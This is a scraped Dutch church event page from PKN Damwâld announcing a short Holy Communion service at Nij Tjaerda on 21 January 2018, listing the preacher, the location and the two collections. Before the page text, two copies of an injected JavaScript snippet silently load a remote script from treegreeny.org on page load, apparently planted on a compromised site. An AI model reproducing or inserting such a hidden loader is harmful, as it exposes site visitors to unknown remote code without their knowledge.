;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Korte viering Heilig Avondmaal Nij Tjaerda - PKN Damwâld
zondag 21 januari 2018
16:00 uur

Korte viering Heilig Avondmaal Nij Tjaerda

Thema: Viering Heilig Avondmaal

Informatie

Voorganger:Ds. W.L. de Jong, Rinsumageast
Thema:Viering Heilig Avondmaal
Locatie: Nij Tjaerda Damwald, Badhuisweg, Damwâld
Collecte informatie
Eerste collecte: Werelddiaconaat, Ghana
Tweede collecte: Avondmaalscollecte